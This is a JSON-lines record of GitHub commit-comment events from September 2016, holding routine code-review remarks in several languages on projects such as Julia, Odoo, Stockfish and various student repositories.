{"id":"4583263849","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19078467,"position":null,"line":null,"path":null,"commit_id":"3a311556050ee70e71c43c3ca6bc86165174da77","created_at":"2016-09-19T13:24:45Z","updated_at":"2016-09-19T13:24:45Z","body":"we can make nanosoldier approximately bisect for us by triggering a bunch of builds against whatever commit the previous nightly build ran on"}},"created_at":"2016-09-19T13:24:45Z"}
{"id":"4583264794","type":"CommitCommentEvent","actor":{"login":"darkleaf"},"repo":{"name":"maximtop/check-guess-clj"},"payload":{"comment":{"id":19078470,"position":14,"line":14,"path":"src/check_score_clj/core.clj","commit_id":"3acd5fb36b5a41898a0d62da71f8bd269a41f5a1","created_at":"2016-09-19T13:24:55Z","updated_at":"2016-09-19T13:24:55Z","body":"Возвращать просили число"}},"created_at":"2016-09-19T13:24:55Z"}
{"id":"4583265989","type":"CommitCommentEvent","actor":{"login":"Littlehhh"},"repo":{"name":"Littlehhh/Hello-World"},"payload":{"comment":{"id":19078474,"position":4,"line":6,"path":"README.md","commit_id":"d70376ca3a92388d738486569b80f44b7fec4ad4","created_at":"2016-09-19T13:25:09Z","updated_at":"2016-09-19T13:25:09Z","body":"ahaha\r\n"}},"created_at":"2016-09-19T13:25:09Z"}
{"id":"4583266761","type":"CommitCommentEvent","actor":{"login":"Littlehhh"},"repo":{"name":"Littlehhh/Hello-World"},"payload":{"comment":{"id":19078476,"position":2,"line":4,"path":"README.md","commit_id":"d70376ca3a92388d738486569b80f44b7fec4ad4","created_at":"2016-09-19T13:25:19Z","updated_at":"2016-09-19T13:25:19Z","body":"hahah"}},"created_at":"2016-09-19T13:25:19Z"}
{"id":"4583267947","type":"CommitCommentEvent","actor":{"login":"tgisg"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19078478,"position":28,"line":26,"path":"app/models/order_compiler.rb","commit_id":"efc29e5cc5b21153297ad8833eaa7cddbf1f1828","created_at":"2016-09-19T13:25:32Z","updated_at":"2016-09-19T13:25:32Z","body":"I'm not sure it's good practice to have a method called create in a model."}},"created_at":"2016-09-19T13:25:32Z"}
{"id":"4583270353","type":"CommitCommentEvent","actor":{"login":"darkleaf"},"repo":{"name":"maximtop/check-guess-clj"},"payload":{"comment":{"id":19078484,"position":10,"line":10,"path":"src/check_score_clj/core.clj","commit_id":"3acd5fb36b5a41898a0d62da71f8bd269a41f5a1","created_at":"2016-09-19T13:25:58Z","updated_at":"2016-09-19T13:25:58Z","body":"Тут нужно возвращать keyword, а не строку. Это в js нет кейвордов, а тут есть."}},"created_at":"2016-09-19T13:25:58Z"}
{"id":"4583272738","type":"CommitCommentEvent","actor":{"login":"avifried1"},"repo":{"name":"7thsky/openvv"},"payload":{"comment":{"id":19078489,"position":475,"line":1156,"path":"src/org/openvv/js/OVVAsset.js","commit_id":"0d1077a01dd0678519cb9e6524587d9fcb3ed51f","created_at":"2016-09-19T13:26:25Z","updated_at":"2016-09-19T13:26:25Z","body":"not during test mode, you're right. After that, when debugging, we would want to know the ad was measurable by the IO (in that case the IO would also report viewability percentage)"}},"created_at":"2016-09-19T13:26:25Z"}
{"id":"4583274643","type":"CommitCommentEvent","actor":{"login":"darkleaf"},"repo":{"name":"maximtop/check-guess-clj"},"payload":{"comment":{"id":19078492,"position":5,"line":5,"path":"test/check_score_clj/core_test.clj","commit_id":"3acd5fb36b5a41898a0d62da71f8bd269a41f5a1","created_at":"2016-09-19T13:26:45Z","updated_at":"2016-09-19T13:26:45Z","body":"Название бы по инфорсативнее"}},"created_at":"2016-09-19T13:26:45Z"}
{"id":"4583276805","type":"CommitCommentEvent","actor":{"login":"glestaris"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":19078494,"position":168,"line":167,"path":"image_puller/unpacker/namespaced_cmd_linux.go","commit_id":"b0230f714fc1ceb347ea4c688cd647e7a79965bf","created_at":"2016-09-19T13:27:12Z","updated_at":"2016-09-19T13:27:12Z","body":"It sounds great, that way we can get log entries in real time. https://www.pivotaltracker.com/story/show/130638575"}},"created_at":"2016-09-19T13:27:12Z"}
{"id":"4583277680","type":"CommitCommentEvent","actor":{"login":"xidabei"},"repo":{"name":"xidabei/KTech"},"payload":{"comment":{"id":19078495,"position":null,"line":null,"path":null,"commit_id":"a5e2b1ee5599541a9a47ae94e8d6adea435c9b97","created_at":"2016-09-19T13:27:22Z","updated_at":"2016-09-19T13:27:22Z","body":"Why My Blog does't work. :("}},"created_at":"2016-09-19T13:27:22Z"}
{"id":"4583278196","type":"CommitCommentEvent","actor":{"login":"qaap"},"repo":{"name":"qaap/pharos"},"payload":{"comment":{"id":19078496,"position":null,"line":null,"path":null,"commit_id":"df8f06ce76d0fa9efe470a29ec17fc058068428f","created_at":"2016-09-19T13:27:28Z","updated_at":"2016-09-19T13:27:28Z","body":"Resolves #1 "}},"created_at":"2016-09-19T13:27:28Z"}
{"id":"4583278891","type":"CommitCommentEvent","actor":{"login":"darkleaf"},"repo":{"name":"maximtop/check-guess-clj"},"payload":{"comment":{"id":19078499,"position":6,"line":6,"path":"test/check_score_clj/core_test.clj","commit_id":"3acd5fb36b5a41898a0d62da71f8bd269a41f5a1","created_at":"2016-09-19T13:27:35Z","updated_at":"2016-09-19T13:27:35Z","body":"Посмотри документацию по неймспейсу тест, там есть макрос are."}},"created_at":"2016-09-19T13:27:35Z"}
{"id":"4583280877","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19078505,"position":10,"line":109,"path":"addons/mrp/views/mrp_production_views.xml","commit_id":"948b9627a0c5afe9f6c3c910eba989a217989bf2","created_at":"2016-09-19T13:27:56Z","updated_at":"2016-09-19T13:27:56Z","body":"or you could remove the line :)"}},"created_at":"2016-09-19T13:27:56Z"}
{"id":"4583281211","type":"CommitCommentEvent","actor":{"login":"tgisg"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19078507,"position":17,"line":9,"path":"app/controllers/orders_controller.rb","commit_id":"efc29e5cc5b21153297ad8833eaa7cddbf1f1828","created_at":"2016-09-19T13:28:00Z","updated_at":"2016-09-19T13:28:00Z","body":"Same comment, this should not be OrderCompiler.new(session[:cart], current_user).create because it is confusing. OrderCompiler is never an object that is being saved to the database. "}},"created_at":"2016-09-19T13:28:00Z"}
{"id":"4583281352","type":"CommitCommentEvent","actor":{"login":"qaap"},"repo":{"name":"qaap/pharos"},"payload":{"comment":{"id":19078508,"position":null,"line":null,"path":null,"commit_id":"b2a56e144baa13e587e4eaaf041eaa4c9d0c17f2","created_at":"2016-09-19T13:28:02Z","updated_at":"2016-09-19T13:28:02Z","body":"Resolves #2 "}},"created_at":"2016-09-19T13:28:02Z"}
{"id":"4583281666","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"ValentinaSbLn/ThirdLab"},"payload":{"comment":{"id":19078511,"position":1,"line":21,"path":"src/collections/FirstTask.java","commit_id":"7cf5ec7a6e6b13e03fed400199fe64c53869a28f","created_at":"2016-09-19T13:28:07Z","updated_at":"2016-09-19T13:28:07Z","body":"\"HashSet<String> fileWords\" следует заменить на Set<String> - всем, кто работает с fileWords не нужно знать, что за имплементация лежит внутри этого Set'а"}},"created_at":"2016-09-19T13:28:07Z"}
{"id":"4583282414","type":"CommitCommentEvent","actor":{"login":"aviadhahami"},"repo":{"name":"jacklam718/react-native-popup-dialog"},"payload":{"comment":{"id":19078512,"position":null,"line":null,"path":null,"commit_id":"284417ae70d1eab8b0c0fdb9e18ea8601035d741","created_at":"2016-09-19T13:28:17Z","updated_at":"2016-09-19T13:28:17Z","body":"@jacklam718 I think if we'd have a default value for the padding of the dialog's content it could be nice.\r\nUp to u :)"}},"created_at":"2016-09-19T13:28:17Z"}
{"id":"4583282762","type":"CommitCommentEvent","actor":{"login":"GennadiyK"},"repo":{"name":"GennadiyK/bookingYourTeacher"},"payload":{"comment":{"id":19078516,"position":1,"line":1,"path":"sass/_st.scss","commit_id":"27b453dada523a4e0d2ea9436bb0b5c21a98dcf2","created_at":"2016-09-19T13:28:21Z","updated_at":"2016-09-19T13:28:21Z","body":"are you shure that .app should be in a _st.scss ?"}},"created_at":"2016-09-19T13:28:21Z"}
{"id":"4583283599","type":"CommitCommentEvent","actor":{"login":"pashokkumar"},"repo":{"name":"pashokkumar/mindstuffs-blog"},"payload":{"comment":{"id":19078518,"position":null,"line":null,"path":null,"commit_id":"7e645ec15595c4a8c6e3ba304ec94ef9a814d3fe","created_at":"2016-09-19T13:28:29Z","updated_at":"2016-09-19T13:28:29Z","body":"test"}},"created_at":"2016-09-19T13:28:29Z"}
{"id":"4583284043","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test1"},"payload":{"comment":{"id":19078520,"position":2,"line":5,"path":"src/test/resources/features/projects/project.feature","commit_id":"b4a4ed43cc2f97ac11d113cc1a1d4ba653eb71fb","created_at":"2016-09-19T13:28:34Z","updated_at":"2016-09-19T13:28:34Z","body":"@AT-01/team1 \r\nWhere are the assertions?"}},"created_at":"2016-09-19T13:28:34Z"}
{"id":"4583284346","type":"CommitCommentEvent","actor":{"login":"Yourdimitrov"},"repo":{"name":"Yourdimitrov/test-repo"},"payload":{"comment":{"id":19078521,"position":null,"line":null,"path":null,"commit_id":"ac9bb1f88bb8674db66e95bfdddde81aee2cfcf2","created_at":"2016-09-19T13:28:38Z","updated_at":"2016-09-19T13:28:38Z","body":"ghhg"}},"created_at":"2016-09-19T13:28:38Z"}
{"id":"4583287082","type":"CommitCommentEvent","actor":{"login":"GennadiyK"},"repo":{"name":"GennadiyK/bookingYourTeacher"},"payload":{"comment":{"id":19078533,"position":2,"line":2,"path":"sass/_st.scss","commit_id":"27b453dada523a4e0d2ea9436bb0b5c21a98dcf2","created_at":"2016-09-19T13:29:10Z","updated_at":"2016-09-19T13:29:10Z","body":"are you shure that .sidebar should be in _sr.scss ?"}},"created_at":"2016-09-19T13:29:10Z"}
{"id":"4583288055","type":"CommitCommentEvent","actor":{"login":"martinjhnhadley"},"repo":{"name":"ox-it/OxfordIDN_htmlwidgets"},"payload":{"comment":{"id":19078538,"position":null,"line":null,"path":null,"commit_id":"7e070c1b2fa87754fdce0440a7191e7d0848ac59","created_at":"2016-09-19T13:29:21Z","updated_at":"2016-09-19T13:29:21Z","body":"Fixed https://github.com/ox-it/OxfordIDN_htmlwidgets/issues/45"}},"created_at":"2016-09-19T13:29:21Z"}
{"id":"4583288271","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19078540,"position":null,"line":null,"path":null,"commit_id":"02cb2d050c2edfc46aa0507d46c1b30763467e25","created_at":"2016-09-19T13:29:23Z","updated_at":"2016-09-19T13:29:23Z","body":"Bleh. I'll do over. "}},"created_at":"2016-09-19T13:29:23Z"}
{"id":"4583288363","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"KOBUGE-Games/minilens"},"payload":{"comment":{"id":19078541,"position":5,"line":11,"path":"engine.cfg","commit_id":"818aa2205c4a864eb6b7909272a1bbfd7c019c44","created_at":"2016-09-19T13:29:24Z","updated_at":"2016-09-19T13:29:24Z","body":"That's why you should never trust automerge to do it right..."}},"created_at":"2016-09-19T13:29:24Z"}
{"id":"4583291194","type":"CommitCommentEvent","actor":{"login":"palinek"},"repo":{"name":"lxde/lxqt-panel"},"payload":{"comment":{"id":19078544,"position":9,"line":200,"path":"CMakeLists.txt","commit_id":"0773ef8b47336f4d9b0fa10391db64190b58e36b","created_at":"2016-09-19T13:29:54Z","updated_at":"2016-09-19T13:29:54Z","body":"As @luis-pereira pointed on some other place... the \"NOTFOUND\" is considered as false by cmake so it should be enough `if (VARIABLE_NAME_HERE)...`"}},"created_at":"2016-09-19T13:29:54Z"}
{"id":"4583292917","type":"CommitCommentEvent","actor":{"login":"tgisg"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19078549,"position":33,"line":25,"path":"spec/models/order_compiler_spec.rb","commit_id":"efc29e5cc5b21153297ad8833eaa7cddbf1f1828","created_at":"2016-09-19T13:30:19Z","updated_at":"2016-09-19T13:30:19Z","body":"Same problem with naming the method .create"}},"created_at":"2016-09-19T13:30:19Z"}
{"id":"4583293219","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19078550,"position":null,"line":null,"path":null,"commit_id":"948b9627a0c5afe9f6c3c910eba989a217989bf2","created_at":"2016-09-19T13:30:23Z","updated_at":"2016-09-19T13:30:23Z","body":"[REF] mrp: production order: rename \"expected start date\" to \"deadline start\"\r\n\r\nAlso, don't show the `date_planned_finished` field, as it's confusing with the work orders end date. Adapt the views accordingly."}},"created_at":"2016-09-19T13:30:23Z"}
{"id":"4583294156","type":"CommitCommentEvent","actor":{"login":"dkastner"},"repo":{"name":"faradayio/conductor"},"payload":{"comment":{"id":19078552,"position":null,"line":null,"path":null,"commit_id":"026fcee73c0fb5aeaade81e7052c3daaa5898da9","created_at":"2016-09-19T13:30:32Z","updated_at":"2016-09-19T13:30:32Z","body":"Cool! I was wondering how you include files into a package"}},"created_at":"2016-09-19T13:30:32Z"}
{"id":"4583294427","type":"CommitCommentEvent","actor":{"login":"advir1"},"repo":{"name":"7thsky/openvv"},"payload":{"comment":{"id":19078554,"position":475,"line":1156,"path":"src/org/openvv/js/OVVAsset.js","commit_id":"0d1077a01dd0678519cb9e6524587d9fcb3ed51f","created_at":"2016-09-19T13:30:35Z","updated_at":"2016-09-19T13:30:35Z","body":"We have other ways of debugging, eg. run flash in debug mode, eg. set monitoring rate for placement to 100. Let's try to avoid relying on $ovv.DEBUG, and unnecessary additional complexity."}},"created_at":"2016-09-19T13:30:35Z"}
{"id":"4583295854","type":"CommitCommentEvent","actor":{"login":"itbut"},"repo":{"name":"itbut/java"},"payload":{"comment":{"id":19078559,"position":null,"line":null,"path":null,"commit_id":"65b7695075873e1a3c3be6ad63e2bad99e9a448c","created_at":"2016-09-19T13:30:50Z","updated_at":"2016-09-19T13:30:50Z","body":"Netbeans macros:  sout   System.out.println(\"\");"}},"created_at":"2016-09-19T13:30:50Z"}
{"id":"4583298157","type":"CommitCommentEvent","actor":{"login":"fdefalco"},"repo":{"name":"OHDSI/Atlas"},"payload":{"comment":{"id":19078562,"position":null,"line":null,"path":null,"commit_id":"8878600b17f0261be4d585d8a599864f2d987f41","created_at":"2016-09-19T13:31:18Z","updated_at":"2016-09-19T13:31:18Z","body":"I don't mind the idea of the status colors providing the user the context of what is open / unsaved but I would like to come up with something other than the icons changing colors.  I'll think through some options."}},"created_at":"2016-09-19T13:31:18Z"}
{"id":"4583302129","type":"CommitCommentEvent","actor":{"login":"jeannunes"},"repo":{"name":"modafocabr/Processo-de-Vendas"},"payload":{"comment":{"id":19078570,"position":null,"line":null,"path":null,"commit_id":"428f5298d057c7c4dafcdcd41a71ecba30860821","created_at":"2016-09-19T13:31:59Z","updated_at":"2016-09-19T13:31:59Z","body":"shit"}},"created_at":"2016-09-19T13:31:59Z"}
{"id":"4583302154","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test2"},"payload":{"comment":{"id":19078571,"position":17,"line":18,"path":"src/main/java/org/fundacionjala/pivotalapi/api/RequestManager.java","commit_id":"0df014d5266746c6d260e60a2e3c75906e83a28c","created_at":"2016-09-19T13:32:00Z","updated_at":"2016-09-19T13:32:00Z","body":"This should be private"}},"created_at":"2016-09-19T13:32:00Z"}
{"id":"4583307813","type":"CommitCommentEvent","actor":{"login":"bcb"},"repo":{"name":"bcb/jsonrpcclient"},"payload":{"comment":{"id":19078584,"position":null,"line":null,"path":null,"commit_id":"5fa1f849096a5046d88b126c84b73c6e45bfdf44","created_at":"2016-09-19T13:33:05Z","updated_at":"2016-09-19T13:33:05Z","body":"Created issue #29."}},"created_at":"2016-09-19T13:33:05Z"}
{"id":"4583308173","type":"CommitCommentEvent","actor":{"login":"bcre-ubx"},"repo":{"name":"bcre-ubx/game-of-life"},"payload":{"comment":{"id":19078586,"position":null,"line":null,"path":null,"commit_id":"5d5288462ec3f1330a66d50089f481b02e1e81f8","created_at":"2016-09-19T13:33:10Z","updated_at":"2016-09-19T13:33:10Z","body":"This is a comment on a commit."}},"created_at":"2016-09-19T13:33:10Z"}
{"id":"4583308942","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test2"},"payload":{"comment":{"id":19078595,"position":16,"line":34,"path":"src/main/java/org/fundacionjala/pivotalapi/api/RequestManager.java","commit_id":"c8ef1fb6b7a858e18cfd06e7d4b19dfaa4a19d6a","created_at":"2016-09-19T13:33:19Z","updated_at":"2016-09-19T13:33:19Z","body":"Change it by  .contentType(ContentType.JSON)"}},"created_at":"2016-09-19T13:33:19Z"}
{"id":"4583309280","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test2"},"payload":{"comment":{"id":19078597,"position":34,"line":51,"path":"src/main/java/org/fundacionjala/pivotalapi/api/RequestManager.java","commit_id":"c8ef1fb6b7a858e18cfd06e7d4b19dfaa4a19d6a","created_at":"2016-09-19T13:33:22Z","updated_at":"2016-09-19T13:33:22Z","body":"Change it by  .contentType(ContentType.JSON)"}},"created_at":"2016-09-19T13:33:22Z"}
{"id":"4583310986","type":"CommitCommentEvent","actor":{"login":"emk"},"repo":{"name":"faradayio/conductor"},"payload":{"comment":{"id":19078601,"position":null,"line":null,"path":null,"commit_id":"026fcee73c0fb5aeaade81e7052c3daaa5898da9","created_at":"2016-09-19T13:33:40Z","updated_at":"2016-09-19T13:33:40Z","body":"The usual: There's a crate for that. :-) In this case, it uses `build.rs`, which allows us to run some Rust code (and use third-party crates) at build time. I sent a patch upstream to add a new API we needed.\r\n\r\nI feel like including an entire directory tree in the app the right move here, because we can easily update the templates without needing source changes to make the new file visible."}},"created_at":"2016-09-19T13:33:40Z"}
{"id":"4583311140","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19078602,"position":null,"line":null,"path":null,"commit_id":"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4","created_at":"2016-09-19T13:33:42Z","updated_at":"2016-09-19T13:33:42Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#IMyeBKZZRu-duYtxjNRtmw"}},"created_at":"2016-09-19T13:33:42Z"}
{"id":"4583311959","type":"CommitCommentEvent","actor":{"login":"xudafeng"},"repo":{"name":"macacajs/app-inspector"},"payload":{"comment":{"id":19078605,"position":5,"line":9,"path":"lib/ios.js","commit_id":"6f8c6a7c10b6bed02870e8561b4c543f52baf0ea","created_at":"2016-09-19T13:33:51Z","updated_at":"2016-09-19T13:33:51Z","body":"这里顺序不对，跟其他风格不统一"}},"created_at":"2016-09-19T13:33:51Z"}
{"id":"4583317769","type":"CommitCommentEvent","actor":{"login":"cc02030"},"repo":{"name":"aurajs/aura"},"payload":{"comment":{"id":19078615,"position":null,"line":null,"path":null,"commit_id":"8c2275a003702c9480f83fe1593e08ca05c50a7d","created_at":"2016-09-19T13:34:54Z","updated_at":"2016-09-19T13:34:54Z","body":"cc02030 doesn’t have any public repositories yet."}},"created_at":"2016-09-19T13:34:54Z"}
{"id":"4583318175","type":"CommitCommentEvent","actor":{"login":"Totktonada"},"repo":{"name":"whatifrussian/website"},"payload":{"comment":{"id":19078617,"position":null,"line":null,"path":null,"commit_id":"46fab48632434a5f7b1f9efd2fca8082a9d2f828","created_at":"2016-09-19T13:34:59Z","updated_at":"2016-09-19T13:34:59Z","body":"Examples:\r\nhttps://chtoes.li/alternate-universe-what-ifs\r\nhttps://chtoes.li/lightning\r\nhttps://chtoes.li/space-burial"}},"created_at":"2016-09-19T13:34:59Z"}
{"id":"4583319374","type":"CommitCommentEvent","actor":{"login":"cc02030"},"repo":{"name":"aurajs/aura"},"payload":{"comment":{"id":19078622,"position":null,"line":null,"path":null,"commit_id":"8c2275a003702c9480f83fe1593e08ca05c50a7d","created_at":"2016-09-19T13:35:16Z","updated_at":"2016-09-19T13:35:16Z","body":"God"}},"created_at":"2016-09-19T13:35:16Z"}
{"id":"4583324198","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":19078631,"position":null,"line":null,"path":null,"commit_id":"b41abf7496039b24a9a6e0838350870fdc1d9367","created_at":"2016-09-19T13:36:09Z","updated_at":"2016-09-19T13:36:09Z","body":"this should be covered by the test from the repro code in bug73113."}},"created_at":"2016-09-19T13:36:09Z"}
{"id":"4583326041","type":"CommitCommentEvent","actor":{"login":"sf-x"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19078634,"position":null,"line":null,"path":null,"commit_id":"31d4cb7a1ae9bc4b19354acd6621e1f216d53eb3","created_at":"2016-09-19T13:36:29Z","updated_at":"2016-09-19T13:36:29Z","body":"Looks like wins=losses, perharps you need to break fishtest's adjudication to get useful results?"}},"created_at":"2016-09-19T13:36:29Z"}
{"id":"4583327498","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"ValentinaSbLn/ThirdLab"},"payload":{"comment":{"id":19078636,"position":8,"line":27,"path":"src/collections/FirstTask.java","commit_id":"7cf5ec7a6e6b13e03fed400199fe64c53869a28f","created_at":"2016-09-19T13:36:44Z","updated_at":"2016-09-19T13:36:44Z","body":"У вас получается файл words.txt такой, что в нём каждая строка = 1 слово.\r\nИдея в том, что файл должен выглядеть примерно так:\r\n\r\nI am student\r\nI have an idea\r\nThis is a table\r\nperson\r\nhello student\r\nsuper idea"}},"created_at":"2016-09-19T13:36:44Z"}
{"id":"4583331804","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19078641,"position":null,"line":null,"path":null,"commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T13:37:32Z","updated_at":"2016-09-19T13:37:32Z","body":"> We should also reconsider the \"search away from normal\" behavior, in the presence of potentially much finer gradations of weight.\r\n\r\nWe do have to preserve backwards-compatibility, though. It seems like a bad idea to search backwards in intervals of 100 but search any other way in between those points."}},"created_at":"2016-09-19T13:37:32Z"}
{"id":"4583334809","type":"CommitCommentEvent","actor":{"login":"TheCrashedHelicopter"},"repo":{"name":"TheCrashedHelicopter/imad-2016-app"},"payload":{"comment":{"id":19078645,"position":null,"line":null,"path":null,"commit_id":"fdb6ce2f1cd0906487675577a30062ebe9b9447c","created_at":"2016-09-19T13:38:00Z","updated_at":"2016-09-19T13:38:00Z","body":"ok this is pic for ui"}},"created_at":"2016-09-19T13:38:00Z"}
{"id":"4583334940","type":"CommitCommentEvent","actor":{"login":"nudles"},"repo":{"name":"gokulr914/new"},"payload":{"comment":{"id":19078646,"position":68,"line":68,"path":"b/MainActivity.java","commit_id":"915451aac7c66e46001ded79b2c7a587c240884f","created_at":"2016-09-19T13:38:02Z","updated_at":"2016-09-19T13:38:02Z","body":"why do you set the window size to 128?"}},"created_at":"2016-09-19T13:38:02Z"}
{"id":"4583339493","type":"CommitCommentEvent","actor":{"login":"nudles"},"repo":{"name":"gokulr914/new"},"payload":{"comment":{"id":19078654,"position":73,"line":73,"path":"b/MainActivity.java","commit_id":"915451aac7c66e46001ded79b2c7a587c240884f","created_at":"2016-09-19T13:38:51Z","updated_at":"2016-09-19T13:38:51Z","body":"you can replace AccHistory_1 to AccHistoryXXX where XXX are for the feature name?"}},"created_at":"2016-09-19T13:38:51Z"}
{"id":"4583341145","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test2"},"payload":{"comment":{"id":19078661,"position":1,"line":15,"path":"src/main/java/org/fundacionjala/pivotalapi/util/Environment.java","commit_id":"a4c4bd09a74915f1a6c0e84c899346be5b679dee","created_at":"2016-09-19T13:39:11Z","updated_at":"2016-09-19T13:39:11Z","body":"@AT-01/team2 \r\nPlease apply static code analysis in your project."}},"created_at":"2016-09-19T13:39:11Z"}
{"id":"4583342182","type":"CommitCommentEvent","actor":{"login":"tonioo"},"repo":{"name":"tonioo/modoboa"},"payload":{"comment":{"id":19078662,"position":21,"line":113,"path":"modoboa/admin/models/domain.py","commit_id":"e0f2f345232734c699cb19a9f86708e74b7ddafe","created_at":"2016-09-19T13:39:22Z","updated_at":"2016-09-19T13:39:22Z","body":"Why forcing conversion ?"}},"created_at":"2016-09-19T13:39:22Z"}
{"id":"4583342893","type":"CommitCommentEvent","actor":{"login":"sf-x"},"repo":{"name":"sf-x/Stockfish"},"payload":{"comment":{"id":19078666,"position":null,"line":null,"path":null,"commit_id":"0c2f878a9f2700d4f94c4d5c7d360955060ab22b","created_at":"2016-09-19T13:39:29Z","updated_at":"2016-09-19T13:39:29Z","body":"Didn't Marco Costalba declare this \"not a simplification\"?"}},"created_at":"2016-09-19T13:39:29Z"}
{"id":"4583344588","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19078670,"position":null,"line":null,"path":null,"commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T13:39:46Z","updated_at":"2016-09-19T13:39:46Z","body":"> Yes, that seems like it could get tricky. To be considered further...\r\n\r\nIf there is a good solution to this, then this is definitely better than the current proposal."}},"created_at":"2016-09-19T13:39:46Z"}
{"id":"4583344829","type":"CommitCommentEvent","actor":{"login":"nudles"},"repo":{"name":"gokulr914/new"},"payload":{"comment":{"id":19078671,"position":89,"line":89,"path":"b/MainActivity.java","commit_id":"915451aac7c66e46001ded79b2c7a587c240884f","created_at":"2016-09-19T13:39:49Z","updated_at":"2016-09-19T13:39:49Z","body":"there are too many variables whose names cannot be self-explained."}},"created_at":"2016-09-19T13:39:49Z"}
{"id":"4583346082","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19078674,"position":null,"line":null,"path":null,"commit_id":"f34e82a74e6676b6b19bbb405d26cf84dfdc9d1f","created_at":"2016-09-19T13:40:02Z","updated_at":"2016-09-19T13:40:02Z","body":"[REF] mrp: mo view: date_planned_start, user_id and origin fields should be editable\r\n\r\n"}},"created_at":"2016-09-19T13:40:02Z"}
{"id":"4583346766","type":"CommitCommentEvent","actor":{"login":"Siddhartha-03"},"repo":{"name":"Siddhartha-03/Technical-Communication"},"payload":{"comment":{"id":19078676,"position":2,"line":2,"path":"README.md","commit_id":"47a62c7bc75fd7ac008c7bcb9e81e2767c1faac3","created_at":"2016-09-19T13:40:13Z","updated_at":"2016-09-19T13:40:13Z","body":"what is this"}},"created_at":"2016-09-19T13:40:13Z"}
{"id":"4583348418","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19078681,"position":12,"line":113,"path":"addons/mrp/views/mrp_production_views.xml","commit_id":"f34e82a74e6676b6b19bbb405d26cf84dfdc9d1f","created_at":"2016-09-19T13:40:33Z","updated_at":"2016-09-19T13:40:33Z","body":"note: user_id and origin will be editable event if the PO is done, which is not good IMO"}},"created_at":"2016-09-19T13:40:33Z"}
{"id":"4583348618","type":"CommitCommentEvent","actor":{"login":"nudles"},"repo":{"name":"gokulr914/new"},"payload":{"comment":{"id":19078682,"position":182,"line":182,"path":"b/MainActivity.java","commit_id":"915451aac7c66e46001ded79b2c7a587c240884f","created_at":"2016-09-19T13:40:35Z","updated_at":"2016-09-19T13:40:35Z","body":"where are the extracted features?\r\nThey should be concatenated into a single array?"}},"created_at":"2016-09-19T13:40:35Z"}
{"id":"4583352941","type":"CommitCommentEvent","actor":{"login":"tonioo"},"repo":{"name":"tonioo/modoboa"},"payload":{"comment":{"id":19078694,"position":12,"line":30,"path":"modoboa/admin/templates/admin/domain_detail.html","commit_id":"e0f2f345232734c699cb19a9f86708e74b7ddafe","created_at":"2016-09-19T13:41:23Z","updated_at":"2016-09-19T13:41:23Z","body":"I guess it could be moved upper (before the test on awaiting_checks) ?"}},"created_at":"2016-09-19T13:41:23Z"}
{"id":"4583352970","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"ValentinaSbLn/ThirdLab"},"payload":{"comment":{"id":19078695,"position":1,"line":21,"path":"src/collections/FirstTask.java","commit_id":"7cf5ec7a6e6b13e03fed400199fe64c53869a28f","created_at":"2016-09-19T13:41:23Z","updated_at":"2016-09-19T13:41:23Z","body":"Неправильно в данном контексте определять filie как статическую переменную."}},"created_at":"2016-09-19T13:41:23Z"}
{"id":"4583354388","type":"CommitCommentEvent","actor":{"login":"vickymg"},"repo":{"name":"ministryofjustice/money-to-prisoners-send-money"},"payload":{"comment":{"id":19078698,"position":29,"line":39,"path":"mtp_send_money/templates/send_money/bank-transfer.html","commit_id":"782c7de209196d9284238e94a1c3a990f9c32726","created_at":"2016-09-19T13:41:36Z","updated_at":"2016-09-19T13:41:36Z","body":"Thanks!  Think I fixed it...\r\n"}},"created_at":"2016-09-19T13:41:36Z"}
{"id":"4583354392","type":"CommitCommentEvent","actor":{"login":"tonioo"},"repo":{"name":"tonioo/modoboa"},"payload":{"comment":{"id":19078699,"position":12,"line":14,"path":"modoboa/admin/templates/admin/domains_table.html","commit_id":"e0f2f345232734c699cb19a9f86708e74b7ddafe","created_at":"2016-09-19T13:41:37Z","updated_at":"2016-09-19T13:41:37Z","body":"Same here."}},"created_at":"2016-09-19T13:41:37Z"}
